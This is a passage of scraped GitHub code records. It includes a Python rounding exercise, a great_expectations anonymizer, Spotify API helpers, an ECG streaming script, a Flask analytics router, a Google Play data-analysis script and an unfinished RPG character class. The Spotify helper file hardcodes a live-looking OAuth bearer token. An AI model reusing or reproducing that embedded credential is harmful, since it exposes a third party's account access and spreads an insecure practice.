label!\")\n","repo_name":"yarinluh/Shape-Analysis-Final-Project","sub_path":"control_flow_graph.py","file_name":"control_flow_graph.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32508040612","text":"'''\n7. 
Obter o menor inteiro que seja maior ou igual ao número real x, utilizando a função MenorInteiro abaixo:\n\ndef MenorInteiro(x)\n'''\n\ndef MenorInteiro(x):\n inteiro = round(x)\n if inteiro < x:\n inteiro +=1\n return inteiro\n\nx = float(input())\nprint(f'O menor inteiro é {MenorInteiro(x)}')\n \n","repo_name":"lucas-albuq/PEOO","sub_path":"ListaRev03/q7.py","file_name":"q7.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10793413736","text":"from typing import Any, Optional\n\nfrom great_expectations.core.usage_statistics.anonymizers.base import BaseAnonymizer\nfrom great_expectations.data_context.store.store import Store\n\n\nclass StoreAnonymizer(BaseAnonymizer):\n def __init__(\n self,\n aggregate_anonymizer: \"Anonymizer\", # noqa: F821\n salt: Optional[str] = None,\n ) -> None:\n super().__init__(salt=salt)\n\n self._aggregate_anonymizer = aggregate_anonymizer\n\n def anonymize(\n self, store_name: str, store_obj: Store, obj: Optional[object] = None\n ) -> Any:\n anonymized_info_dict = {}\n anonymized_info_dict[\"anonymized_name\"] = self._anonymize_string(store_name)\n store_backend_obj = store_obj.store_backend\n\n self._anonymize_object_info(\n object_=store_obj,\n anonymized_info_dict=anonymized_info_dict,\n )\n\n anonymized_info_dict[\n \"anonymized_store_backend\"\n ] = self._anonymize_store_backend_info(store_backend_obj=store_backend_obj)\n\n return anonymized_info_dict\n\n def _anonymize_store_backend_info(\n self,\n store_backend_obj: Optional[object] = None,\n store_backend_object_config: Optional[dict] = None,\n ) -> dict:\n assert (\n store_backend_obj or store_backend_object_config\n ), \"Must pass store_backend_obj or store_backend_object_config.\"\n anonymized_info_dict = {}\n if store_backend_obj is not None:\n self._anonymize_object_info(\n object_=store_backend_obj,\n anonymized_info_dict=anonymized_info_dict,\n )\n else:\n class_name = store_backend_object_config.get(\"class_name\")\n module_name = store_backend_object_config.get(\"module_name\")\n if module_name is None:\n module_name = \"great_expectations.data_context.store\"\n self._anonymize_object_info(\n object_config={\"class_name\": class_name, \"module_name\": module_name},\n anonymized_info_dict=anonymized_info_dict,\n )\n return anonymized_info_dict\n\n def can_handle(self, obj: Optional[object] = None, **kwargs) -> bool:\n from great_expectations.data_context.store.store import Store\n\n return (obj is not None and isinstance(obj, Store)) or (\n \"store_name\" in kwargs or \"store_obj\" in kwargs\n )\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/great-expectations/venv/lib/python3.8/site-packages/great_expectations/core/usage_statistics/anonymizers/store_anonymizer.py","file_name":"store_anonymizer.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"42424074633","text":"import requests\nimport random\nimport json\n\nfrom Genetics import *\nfrom MyRequests import *\nfrom Graph import *\n\n#playlistURI = '5Pa5jw42sPQ9SEKu4dEuZN'\n\nheaders = {'Accept': 'application/json','Authorization': 'Bearer 
BQCDi_fPb_43-4ThvnrQrah03KNMmPUuD003TqDWG_mc-DqDQ5xN55p0PzRNT7BDmq2P2yU4shXR6YPzvwVDga7YTQPIORn71uoMUyQy_tjAXqKKL2JzGH6BR17f82BKqz8ZT5pLQoOOZsxHeHnyKl8I3C3UvAkpTjmk0yXV3P3GYlsGAbaOzmCNM5D78ReoSpaqSS21BSdeiMncdGIWmTpzZxHKm1de9I4Z7tHet8xOlOFJT2rAY8UfNrjA4ODm-0ve2jw_sCgTfnWE1FIOoclJDa9yUm2dAmE'}\n\nGET_USERS_PLAYLIST_ENDPOINT = 'https://api.spotify.com/v1/users/{user_id}/playlists?'\nGET_PLAYLIST_ENDPOINT = 'https://api.spotify.com/v1/users/{user_id}/playlists/{playlist_id}'\nGET_PLAYLIST_TRACKS_ENDPOINT = 'https://api.spotify.com/v1/users/{user_id}/playlists/{playlist_id}/tracks'\nGET_AUDIO_FEATURES = 'https://api.spotify.com/v1/audio-features/{id}'\nMAKE_PLAYLIST_ENDPOINT = 'https://api.spotify.com/v1/users/{user_id}/playlists'\nADD_TRACK_TO_PLAYLIST_ENDPOINT = \"https://api.spotify.com/v1/users/{user_id}/playlists/{playlist_id}/tracks\"\n\ndef getPlaylists(token, userID):\n\theaders = {'Accept': 'application/json','Authorization': 'Bearer '+token}\n\turl = GET_USERS_PLAYLIST_ENDPOINT.format(user_id=userID)\n\tresp = requests.get(url, headers=headers)\n\titems = resp.json()['items']\n\tplaylists = []\n\tfor item in items:\n\t\tif(item['owner']['id'] == userID):\n\t\t\tplaylist = []\n\t\t\tplaylist.append(item['name'])\n\t\t\tplaylist.append(item['id'])\n\t\t\tplaylists.append(playlist)\n\treturn playlists\n\ndef getPlaylistTracks(playlistID, userID, token):\n\theaders = {'Accept': 'application/json','Authorization': 'Bearer '+token}\n\turl = GET_PLAYLIST_TRACKS_ENDPOINT.format(user_id=userID, playlist_id=playlistID)\n\tresp = requests.get(url, headers=headers)\n\treturn resp.json()\n\ndef getAudioFeatures(trackID, token):\n\theaders = {'Accept': 'application/json','Authorization': 'Bearer '+token}\n\turl = GET_AUDIO_FEATURES.format(id=trackID)\n\tresp = requests.get(url, headers=headers)\n\treturn resp.json()\n\ndef makePlaylist(playlistIDS, oldName, token, userID):\n\theaders = {'Accept': 'application/json','Authorization': 'Bearer '+token}\n\turl = MAKE_PLAYLIST_ENDPOINT.format(user_id=userID)\n\tname = oldName + '_TPP'\n\tdata = {\"name\": name, \"public\":False}\n\tresp = requests.post(url, headers=headers, data=json.dumps(data))\n\tplaylistID = resp.json()['id']\n\turl2 = ADD_TRACK_TO_PLAYLIST_ENDPOINT.format(user_id=userID, playlist_id=playlistID)\n\tfor trackID in playlistIDS:\n\t trackstring = []\n\t trackstring.append(\"spotify:track:{}\".format(trackID))\n\t data = {\"uris\": trackstring}\n\t resp = requests.post(url2, headers=headers, data=json.dumps(data))\n\ndef getAudioFeaturesForList(items, token):\n\theaders = {'Accept': 'application/json','Authorization': 'Bearer '+token}\n\tplaylistData = []\n\tfor item in items:\n\t data = []\n\t data.append(item['track']['id'])\n\t results = getAudioFeatures(item['track']['id'], token)\n\t data.append(results)\n\t playlistData.append(data)\n\treturn playlistData","repo_name":"charlieringer/TravellingPlaylistProbelmHack","sub_path":"MyRequests.py","file_name":"MyRequests.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6840794902","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nfrom pylsl import StreamInlet, resolve_stream\nimport numpy as np\n# %matplotlib notebook\nfrom matplotlib import pyplot as plt\nfrom network import IncUNet\nimport torch\n#from IPython.display import clear_output\n\n\n# In[ ]:\n\n\nprint(\"looking for an ECG stream...\")\nstreams = resolve_stream('type', 'EEG')\ninlet = 
StreamInlet(streams[0])\n#print(inlet)\n\nC,H,W = 1,1,5000\nloaded_model = IncUNet(in_shape=(C,H,W)) \nloaded_model.load_state_dict(torch.load(SAVED_MODEL_PATH, map_location = lambda storage, loc: storage, pickle_module=pickle))\nloaded_model.to(device)\nloaded_model.eval()\n\n\nsample_count =0\necg_2s = []\nwhile True:\n # get a new sample (you can also omit the timestamp part if you're not\n # interested in it)\n sample, timestamp = inlet.pull_sample()\n ecg_2s.append(sample) \n sample_count+=1\n if(len(ecg_2s)==500):\n plt.close()\n# clear_output()\n ecg_2s = np.array(ecg_2s)*1e-6\n print(ecg_2s.shape)\n plt.plot(ecg_2s[:,0])\n# plt.show()\n plt.pause(0.5)\n plt.close()\n ecg_2s = []\n# \n# plt.plot(ecg_2s)\n# ecg_2s = []\n# print(sample[0])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"acrarshin/OMNI","sub_path":"OMNI_OpenBCI_Pi_Inference/lsl_openbci.py","file_name":"lsl_openbci.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"15253909861","text":"# -*- coding: utf-8 -*\n# author: unknowwhite@outlook.com\n# wechat: Ben_Xiaobai\nimport sys\nsys.path.append(\"..\")\nsys.setrecursionlimit(10000000)\nfrom component.api import get_datas, get_long, shortit, show_short_cut_list, ghost_check ,installation_track,show_project_list,show_mobile_ad_list,show_mobile_src_list,create_mobile_ad_link,check_exist_distinct_id,who_am_i,shortcut_read,show_qrcode,show_long_qrcode,show_all_logos,show_logo\nfrom component.api_noti import show_usergroup_plan,show_usergroup_list,duplicate_scheduler_jobs,show_usergroup_data,disable_usergroup_data,show_temples,apply_temples_list,show_noti_group,show_noti_detial,manual_send,disable_single,show_scheduler_jobs,create_scheduler_jobs_manual,create_manual_temple_noti,create_manual_non_temple_noti\nfrom configs import admin\nfrom flask_cors import CORS\nfrom flask import jsonify\nfrom flask import make_response\nfrom flask import request\nfrom flask import Flask\n\n\napp = Flask(__name__)\nCORS(app)\n\ndef return_error(code=0):\n pagename = str(code) + ' '+admin.bbhj_keyword\n if admin.use_bbhj is False:\n return pagename\n if admin.use_bbhj is True:\n return f\"\"\"\"\"\"\n\n\n\n@app.errorhandler(404)\ndef miss(e):\n return return_error(code=404)\n\n@app.errorhandler(500)\ndef error(e):\n return return_error(code=500)\n\n@app.errorhandler(405)\ndef error2(e):\n return return_error(code=405)\n\n\n@app.route('/')\ndef index():\n return return_error()\n\n#项目管理\napp.add_url_rule('/show_project_list', view_func=show_project_list, methods=['POST'])#查询已有项目信息\n#数据收集\napp.add_url_rule('/sa.gif', view_func=get_datas, methods=['GET', 'POST'])#神策SDK上报接口\n#短连接\napp.add_url_rule('/t/', view_func=get_long, methods=['GET', 'POST'])#解析接口\napp.add_url_rule('/.gif', view_func=shortcut_read, methods=['GET'])#站外跟踪\napp.add_url_rule('/shortit', view_func=shortit, methods=['POST'])#短链创建接口\napp.add_url_rule('/shortlist', view_func=show_short_cut_list,methods=['GET', 'POST'])#短链列表\napp.add_url_rule('/qr/', view_func=show_qrcode,methods=['GET', 'POST'])#显示短连接二维码\napp.add_url_rule('/qrcode', view_func=show_long_qrcode,methods=['GET', 'POST'])#显示长链接二维码\napp.add_url_rule('/image/', view_func=show_logo, methods=['GET'])#显示LOGO预览\napp.add_url_rule('/logo_list', view_func=show_all_logos, methods=['GET'])#显示LOGO预览\n#埋点管理\napp.add_url_rule('/ghost_check', view_func=ghost_check, methods=['POST'])#埋点校验接口\n#移动广告跟踪\napp.add_url_rule('/cb/installation_track', view_func=installation_track, 
methods=['GET'])#DSP上报接口\napp.add_url_rule('/show_mobile_ad_list', view_func=show_mobile_ad_list, methods=['GET'])#移动跟踪列表\napp.add_url_rule('/create_mobile_ad_link', view_func=create_mobile_ad_link, methods=['POST'])#创建移动广告跟踪链接\napp.add_url_rule('/show_mobile_src_list', view_func=show_mobile_src_list, methods=['GET','POST'])#获取支持的跟踪列表\napp.add_url_rule('/check_exist', view_func=check_exist_distinct_id, methods=['GET'])#查询idfa或其他id是否已存在\n#辅助功能\napp.add_url_rule('/who_am_i', view_func=who_am_i, methods=['GET'])#获取自身ip\n\n#用户分群与召回\n# app.add_url_rule('/usergroups/check_enable_project', view_func=create_mobile_ad_link, methods=['POST'])#查询开启了用户分群与召回的项目列表\napp.add_url_rule('/usergroups/show_usergroup_plan', view_func=show_usergroup_plan, methods=['POST'])#查询用户分群计划列表\napp.add_url_rule('/usergroups/show_usergroup_list', view_func=show_usergroup_list, methods=['POST'])#查询计划下的用户分群列表\napp.add_url_rule('/usergroups/duplicate_scheduler_jobs', view_func=duplicate_scheduler_jobs, methods=['POST'])#重新执行该分群\napp.add_url_rule('/usergroups/show_usergroup_data', view_func=show_usergroup_data, methods=['POST'])#查询计划下的用户分群列表的详情\napp.add_url_rule('/usergroups/disable_usergroup_data', view_func=disable_usergroup_data, methods=['POST'])#禁用单条分群结果\napp.add_url_rule('/usergroups/show_temples', view_func=show_temples, methods=['POST'])#查询可用的模板列表\napp.add_url_rule('/usergroups/apply_temples_list', view_func=apply_temples_list, methods=['POST'])#对单个分群列表应用模板\napp.add_url_rule('/usergroups/show_noti_group', view_func=show_noti_group, methods=['POST'])#查询消息群组\napp.add_url_rule('/usergroups/show_noti_detial', view_func=show_noti_detial, methods=['POST'])#查询消息群组详情\napp.add_url_rule('/usergroups/manual_send', view_func=manual_send, methods=['POST'])#手动推送消息群组\n# app.add_url_rule('/create_mobile_ad_link', view_func=create_mobile_ad_link, methods=['POST'])#手动推送单条消息\napp.add_url_rule('/usergroups/disable_single_noti', view_func=disable_single, methods=['POST'])#禁用单条消息\napp.add_url_rule('/usergroups/show_scheduler_jobs', view_func=show_scheduler_jobs, methods=['POST'])#查询分群任务列表\n# app.add_url_rule('/create_mobile_ad_link', view_func=create_mobile_ad_link, methods=['POST'])#手动插入推送消息\napp.add_url_rule('/usergroups/create_scheduler_jobs_manual',view_func=create_scheduler_jobs_manual, methods=['POST'])#手动开始执行分群\napp.add_url_rule('/usergroups/create_manual_temple_noti',view_func=create_manual_temple_noti, methods=['POST'])#手动创建模板消息\napp.add_url_rule('/usergroups/create_manual_non_temple_noti',view_func=create_manual_non_temple_noti, methods=['POST'])#手动创建非模板消息\n\nif __name__ == '__main__':\n app.run(threaded=True, host='0.0.0.0', port=8000) # 默认不填写的话,是5000端口;","repo_name":"Tandoy/Bigdata-learn","sub_path":"Data_Buriedpoint/Ghost_sa/ghost_sa-master/flask_main.py","file_name":"flask_main.py","file_ext":"py","file_size_in_byte":5938,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"42283511297","text":"#!/usr/bin/python3\n\nfrom flask import Flask, redirect, url_for\n\napp = Flask(__name__)\n\n@app.route(\"/hello/\")\ndef hello(name):\n return f\"Hello {name} glad you could join us\"\n@app.route(\"/\")\ndef hello_world():\n with open(\"helloworld.txt\", \"w\") as hello:\n hello.write(\"you just wrote this line\")\n return \"File Created\"\n\nif __name__ == \"__main__\":\n 
app.run(port=5006)\n\n","repo_name":"infovein/pyapivz","sub_path":"flaskin/myflask01.py","file_name":"myflask01.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21588386421","text":"#### Consigna N°3\n#Escribir una función que, dado un String, permita validar si este se corresponde o no con un teléfono de CABA.\nimport re\n\ndef telefono_caba(string):\n print(bool(re.match(r'[+](54)(9?)(11)(\\d{8}$)', string)))\n\n#bool --> retorna True or False\n#match --> casi lo mismo que search --> solo que busca en la primer palabra\n# r -->siempre en re para que lea el string\n#[+] --> porque es un metacaracter\n#(9?) --> puede variar si esta o no\n# (\\d) --> numero\n#{8} --> que sean 8 numeros mas, ni mas ni menos\n#$ --> fin de linea\n\n\ndef tiene_h(string):\n print(bool(re.search(\"he{2,3}\", string) and not re.search(\"heeee+\", string)))\n\ntiene_h(\"hee\")\n\n\n\ntelefono_caba(\"1167958727\")\ntelefono_caba (\"+5491167958727\")\ntelefono_caba(\"+54911679587277\")\ntelefono_caba(\"+549111111111111111111111111\")\ntelefono_caba(\"+5491167958727\")\ntiene_h(\"heee\")\ntiene_h(\"heeermosa\")\n\n\nimport re\ndef telcorr(num):\n return bool(re.findall(\"54+(9*)+(\\d{10})\", num))\nprint(telcorr(\"5491167958727\"))\nprint(telcorr(\"54911679587257\"))","repo_name":"maiacarroll/Fundamentos_de_informatica_2022","sub_path":"aa. practicando/ejre.py","file_name":"ejre.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38292164692","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport re\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split as split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error as mse\n\n\n# In[2]:\n\n\n#Step 1. Load the data using pandas.\nappdata = pd.read_csv('/Users/priya/Pravat/Simplilearn Data Analytics/Class2/project/googleplaystore.csv')\nappdata.head(5)\n\n\n# In[3]:\n\n\nappdata.info()\n\n\n# In[4]:\n\n\nappdata.columns\n\n\n# In[5]:\n\n\n#Step 2. Check for null values in the data. Get the number of null values for each column.\nappdata.isnull().sum()\n\n\n# In[6]:\n\n\n#Step 3. Drop records with nulls in any of the columns.\nappdata.dropna(axis = 0, inplace=True)\n\n\n# In[7]:\n\n\n#verify\nappdata.isna().sum()\n\n\n# In[8]:\n\n\nappdata.shape\n\n\n# In[9]:\n\n\n#Step 4. 
Fix incorrect type and inconsistent formatting.\nappdata['Size']\n\n\n# In[10]:\n\n\nappdata['Size'].unique()\n\n\n# In[11]:\n\n\n#Format Size coloumn\nappdata['Size'] = appdata.Size.replace('Varies with device','0k')\nappdata['Size'] = appdata.Size.str.replace('M','000')\nappdata['Size'] = appdata.Size.str.replace('k','')\nappdata['Size'] = appdata.Size.replace('1,000+',1000)\nappdata['Size'] = appdata['Size'].astype(float)\n\n\n# In[12]:\n\n\n#verify\nappdata['Size'].dtype \n\n\n# In[13]:\n\n\n#verify\nappdata['Size']\n\n\n# In[14]:\n\n\n#change datatype for Reviews column to float\nappdata['Reviews']= appdata['Reviews'].astype(float)\n\n\n# In[15]:\n\n\n#Check Installs coloumn\nappdata['Installs'].unique()\n\n\n# In[16]:\n\n\n#Format Installs coloumn\nappdata['Installs'] = appdata.Installs.str.replace(',','')\nappdata['Installs'] = appdata.Installs.str.replace('+','')\nappdata['Installs'] = appdata.Installs.str.replace('Free','')\nappdata['Installs'] = appdata['Installs'].astype(float)\nappdata['Installs'] = appdata['Installs'].astype(float)\n\n\n# In[17]:\n\n\n#verify data type for the coloumn\nappdata['Installs'].dtype\n\n\n# In[18]:\n\n\nappdata.Installs\n\n\n# In[19]:\n\n\n#Check Price coloumn\nappdata['Price'].unique()\n\n\n# In[20]:\n\n\n#Format Price coloumn\nappdata['Price'] = appdata.Price.str.replace('$','').astype(float)\n\n\n# In[21]:\n\n\n#verify\nappdata['Price'].dtype\n\n\n# In[22]:\n\n\nappdata.Price\n\n\n# In[23]:\n\n\n#Step 5. Sanity checks: \n# all ratings are between 1 to 5\nappdata['Rating'].unique()\n\n\n# In[24]:\n\n\nappdata['Rating'].dtype\n\n\n# In[25]:\n\n\n# drop all rows with Ratings outside the 1-5 range\nRatingOut = appdata[(appdata['Rating'] < 0) & (appdata['Rating'] > 5)].index\nappdata.drop(RatingOut , inplace = True)\n\n\n# In[26]:\n\n\n#verify the rows and coloumns\nappdata.shape \n\n\n# In[27]:\n\n\n#Reviews should not be more than installs as only those who installed can review the app. If there are any such records, drop them.\nappdata = appdata[appdata['Reviews'] <= appdata['Installs']]\n\n\n# In[28]:\n\n\n#verify the rows and coloumns after drop\nappdata.shape\n\n\n# In[29]:\n\n\n#For free apps (type = “Free”), the price should not be >0. Drop any such rows.\n#get indexes where free Types have a price over 0\npriceindexOut = appdata[(appdata['Price'] >= 0.1) & (appdata['Type'] == 'Free')].index\n# drop these row \nappdata.drop(priceindexOut ,inplace = True)\n\n\n# In[30]:\n\n\n#verify after drop\nappdata.shape\n\n\n# In[31]:\n\n\n#Step 6. Performing univariate analysis:\n#find possible outliers in Price colomns and Review columns using Box Plot\n\n\n# In[32]:\n\n\nappdata['Price'].describe()\n\n\n# In[33]:\n\n\n#Boxplot for Price\nplt.figure(figsize= (15, 5))\nsns.boxplot(x = appdata.Price, color = 'mediumaquamarine',)\nplt.show()\n\n\n# - From the statistical analysis table and price box plot it is observed that apps over $100 are outliers.\n\n# In[34]:\n\n\n#Boxplot for Review\nplt.figure(figsize= (15, 5))\nsns.boxplot(x = appdata.Reviews, color = 'mediumaquamarine',)\nplt.show()\n\n\n# In[35]:\n\n\nappdata['Reviews'].describe()\n\n\n# - From the statistcial analysis table and box plot, it is observed that the averge number of reviews are 5,14,760 with a standard deviation of 31,46,169 between values. 
This deviation is due to several outliers in reviews column.\n\n# In[36]:\n\n\n#Histogram for Rating\nplt.figure(figsize= (10,5))\nsns.histplot(appdata.Rating, bins = 100, color = 'darkgreen', edgecolor = 'black')\nplt.show()\n\n\n# - From the rating histogram it is observed that most apps lean/skewed towards high ratings.\n\n# In[37]:\n\n\n#Histogram for Size\nplt.figure(figsize= (10,5))\nsns.displot(appdata.Size, kind = 'kde', color= 'steelblue')\nplt.show()\n\n\n# - From the size displot histogram, it is observed that most apps size are below 20,000 kb.\n\n# In[38]:\n\n\n#Step 7. Outlier treatment:\n\n\n# In[39]:\n\n\n#drop Price rows which are above 200\nappdata = appdata[appdata['Price'] < 200]\n#verify\nappdata.shape\n\n\n# In[40]:\n\n\n#Drop Review rows with over 2 million reviews\nappdata = appdata[appdata['Reviews'] <= 2000000]\n#verify\nappdata.shape\n\n\n# In[41]:\n\n\n#Apps having very high number of installs should be dropped from the analysis so drop rows with 100,000,000 and more Installs\nappdata = appdata[appdata['Installs'] <= 100000000]\n#verify\nappdata.shape\n\n\n# In[42]:\n\n\n#Find out the different percentiles – 10, 25, 50, 70, 90, 95, 99\npercentiles = appdata[['Rating','Reviews','Size','Installs','Price']]\n\n\n# In[43]:\n\n\n#10, 25, 50, 70, 90, 95, 99 percentiles\nprint(\"10th percentile : \",\n np.percentile(percentiles, 10))\nprint(\"25th percentile : \",\n np.percentile(percentiles, 25))\nprint(\"50th percentile : \", \n np.percentile(percentiles, 50))\nprint(\"70th percentile : \",\n np.percentile(percentiles, 70))\nprint(\"90th percentile : \",\n np.percentile(percentiles, 90))\nprint(\"95th percentile : \",\n np.percentile(percentiles, 95))\nprint(\"99th percentile : \",\n np.percentile(percentiles, 99))\n\n\n# In[44]:\n\n\n#find out remining outliers with boxplots \npercentiles.boxplot(rot = 50)\n\n\n# In[45]:\n\n\n#zoomed into Rating box plot to find out outliers\npercentiles.boxplot(column=['Rating'])\n\n\n# In[46]:\n\n\n#remove outliers from Ratings\nRatingOut1 = appdata[(appdata['Rating'] < 3.5) ].index\nappdata.drop(RatingOut1 , inplace = True)\n\n\n# In[47]:\n\n\nappdata.shape\n\n\n# In[48]:\n\n\n#zoomed into outliers from price coloumn\npercentiles.boxplot(column = ['Price'], figsize = (6,6))\n\n\n# In[49]:\n\n\n#remove outliers from price coloumn, anything above $40 seems outliers\nPriceOut = appdata[(appdata['Price'] > 40)].index\nappdata.drop(PriceOut , inplace = True)\n#verify\nappdata.shape\n\n\n# In[50]:\n\n\n#zoomed into outliers in Installs coloumn\npercentiles.boxplot(column = ['Installs'])\n\n\n# In[51]:\n\n\n#remove outliers from Installs coloumns\nInstallsout = appdata[(appdata['Installs'] >= 100000000)].index\nappdata.drop(Installsout , inplace = True)\n#verify\nappdata.shape\n\n\n# In[52]:\n\n\n#Step 8. Bivariate analysis\n#Scatter plot for Rating vs. Price\nplt.figure(figsize=(10, 9))\nsns.scatterplot(\n data=appdata, x=\"Rating\", y=\"Price\", hue=\"Rating\",\n sizes=(20, 200), legend=\"full\")\n\n\n# observation in Rating vs Price:\n# - Most Ratings for the apps are with in 4.4 to 5.0 and apps Prices are between 0 and $10. It is also observed that higher Price apps does not mean better ratings.\n\n# In[53]:\n\n\n#Scatter plot for Rating vs. 
Reviews\nplt.figure(figsize=(10, 9))\nsns.scatterplot(\n data=appdata, x=\"Rating\", y=\"Reviews\", hue=\"Rating\",\n sizes=(20, 200), legend=\"full\")\n\n\n# Observation in Rating vs Reviews:\n# - Better ratings apps have most reviews although not everytime is the case.\n\n# In[54]:\n\n\n#Box plot for Rating vs. Content Rating\nplt.figure(figsize=(12, 5))\nrvcr = sns.boxplot(data = appdata,x ='Content Rating', y ='Rating', palette ='Set3')\n\n\n# Observation in Rating vs Content Ratings:\n# - From the box plot, there does not seem to be much difference between Content Ratings in relation to Ratings.\n\n# In[55]:\n\n\n#Box plot for Rating vs. Category\nplt.figure(figsize=(12, 5))\nrvca = sns.boxplot(data = appdata,x ='Category', y ='Rating', palette ='Set3')\nplt.show(plt.setp(rvca.get_xticklabels(), rotation = 80))\n\n\n# In[56]:\n\n\n#categorical data in relation to Genres\nplt.figure(figsize=(20, 10))\ncgen = sns.barplot(data = appdata, x ='Genres', y ='Rating', palette ='Set2') \nplt.show (plt.setp(cgen.get_xticklabels(), rotation=90))\n\n\n# Box plot for Rating vs. Genres\n# - Comics;Creativity and Board Pretend Play has rate best ratings.\n\n# In[57]:\n\n\n#Step 9.Data preprocessing\n\n\n# In[58]:\n\n\ninp1 = appdata.copy()\n\n\n# In[59]:\n\n\ninp1.head(2)\n\n\n# In[60]:\n\n\ninp1.describe()\n\n\n# In[61]:\n\n\n# Apply log transformation to reduce the skew in Reviews and Installs.\ninp1.Reviews = np.log1p(inp1.Reviews.values)\ninp1.Installs = np.log1p(inp1.Installs.values)\n\n\n# In[62]:\n\n\n#verify after apply log transformation.\ninp1.describe()\n\n\n# In[63]:\n\n\n#Drop columns App, Last Updated, Current Ver, and Android Ver.\ninp1 = inp1.drop(['App', 'Last Updated', 'Current Ver', 'Android Ver'], axis = 1)\n\n\n# In[64]:\n\n\n#verify\ninp1.head(2)\n\n\n# In[65]:\n\n\n## convert the object type variable and convert them to dumies \ninp2 = pd.get_dummies(inp1, columns = ['Category','Type','Content Rating','Genres'])\n\n\n# In[66]:\n\n\ninp2\n\n\n# In[67]:\n\n\n#Step 10. Train test split and apply 70-30 split. Name the new dataframes df_train and df_test\ndf_train, df_test = split(inp2, test_size = 0.30, random_state = 12)\n\n\n# In[68]:\n\n\ndf_train.shape\n\n\n# In[69]:\n\n\ndf_test.shape\n\n\n# In[70]:\n\n\n#Step 11. Model bulding\nlm = LinearRegression()\n\n\n# In[71]:\n\n\n# fit the model \nX = df_train.drop(columns=['Rating'])\nY = df_train.Rating\nlm = lm.fit(X,Y)\n\n\n# In[72]:\n\n\nlm.coef_\n\n\n# In[73]:\n\n\nlm.intercept_\n\n\n# In[74]:\n\n\nlm.score(X,Y) # R squared value for the df_train data\n\n\n# In[75]:\n\n\n#ycap that is prediction for the df_train data \nycap = lm.predict(X)\nprint(ycap)\n\n\n# In[76]:\n\n\n#Step 12. 
Make predictions for df_test data\ndf_test_x = df_test.drop(columns = ['Rating'])\n\n\n# In[77]:\n\n\ny_pred = lm.predict(df_test_x)\nprint (y_pred)\n\n\n# In[78]:\n\n\nmse(y_true = df_test.Rating, y_pred = y_pred, squared = False) #MSE value for df_test data\n\n","repo_name":"pravatsahu01/Python-Google-Playstore","sub_path":"Pravat Sahu Google Playstore Project.py","file_name":"Pravat Sahu Google Playstore Project.py","file_ext":"py","file_size_in_byte":9901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38004571413","text":"from random import randint\nimport math\nfrom Classes.magic import ward_magic, sword_magic, sorce_magic\nfrom Classes.inventory import spellsword_inv, warden_inv, sorceror_inv\n\ndef build_hp(char):\n return\n\n\ndef build_mp(char):\n return char.get_lvl() * 10 + char.lvl * char.get_wis()\n\n\ndef value_mod(stat):\n return math.floor(((stat - 10) / 2))\n\n\nclass Character:\n\n def __init__(self, name, _str, _int, dex, wis, cha, con, magic, items, rollover=10, rollover2=10, money=0, lvl=1,\n _id=\"player\",\n prof=\"None\", magic_ac = 0):\n self.name = name\n self.lvl = lvl\n self.str = _str\n self.int = _int\n self.dex = dex\n self.wis = wis\n self.cha = cha\n self.con = con\n self.magic = magic\n self.items = items\n self.rollover = rollover\n self.maxhp = self.rollover + value_mod(self.con) + (self.lvl - 1) * (randint(0, self.rollover) + value_mod(self.con))\n self.hp = self.maxhp\n self.rollover2 = rollover2\n self.maxmp = self.rollover2 + value_mod(self.wis) + (self.lvl - 1) * (randint(0, self.rollover2) + value_mod(self.wis))\n self.mp = self.maxmp\n self.sleep = False\n self.fire = 0\n self.money = money\n self.quest = 0\n self.xp = 0\n self.id = _id\n self.prof = prof\n self.magic_ac = magic_ac\n\n def get_lvl(self):\n return self.lvl\n\n def display_name(self):\n print(\"I am called \", self.name, \"!\")\n\n def get_str(self):\n val = value_mod(self.str)\n return val\n\n def get_int(self):\n val = value_mod(self.int)\n return val\n\n def get_dex(self):\n val = value_mod(self.dex)\n return val\n\n def get_wis(self):\n val = value_mod(self.wis)\n return val\n\n def get_cha(self):\n val = value_mod(self.cha)\n return val\n\n def get_con(self):\n val = value_mod(self.con)\n return val\n\n def get_hp(self):\n return self.hp\n\n def get_mp(self):\n return self.mp\n\n def attack(self):\n print(\"{} attacks!\".format(self.name))\n return randint(1, 21) + self.get_str()\n\n def initiative(self):\n return randint(1,21) + self.get_dex()\n\n def ac_rating(self):\n return 10 + self.get_dex() + self.items[\"armor\"].val + self.magic_ac\n\n def reflex(self):\n return randint(1, 21) + self.get_dex()\n\n def fortitude(self):\n return randint(1, 21) + self.get_con()\n\n def will(self):\n return randint(1, 21) + self.get_wis()\n\n def take_damage(self, val):\n self.hp -= val\n print(\"{} has taken {} points of damage.\".format(self.name, val))\n return self.hp\n\n def take_mp(self, cost):\n self.mp -= cost\n return self.mp\n\n def heal(self, val):\n self.hp += val\n if self.hp > self.maxhp:\n self.hp = self.maxhp\n print(\"{} has healed for {} HP.\".format(self.name, val))\n return self.hp\n\n def rest(self, val):\n self.mp += val\n if self.mp > self.maxmp:\n self.mp = self.maxmp\n return self.mp\n\n def display_stats(self):\n print(\"Name: \", self.name, 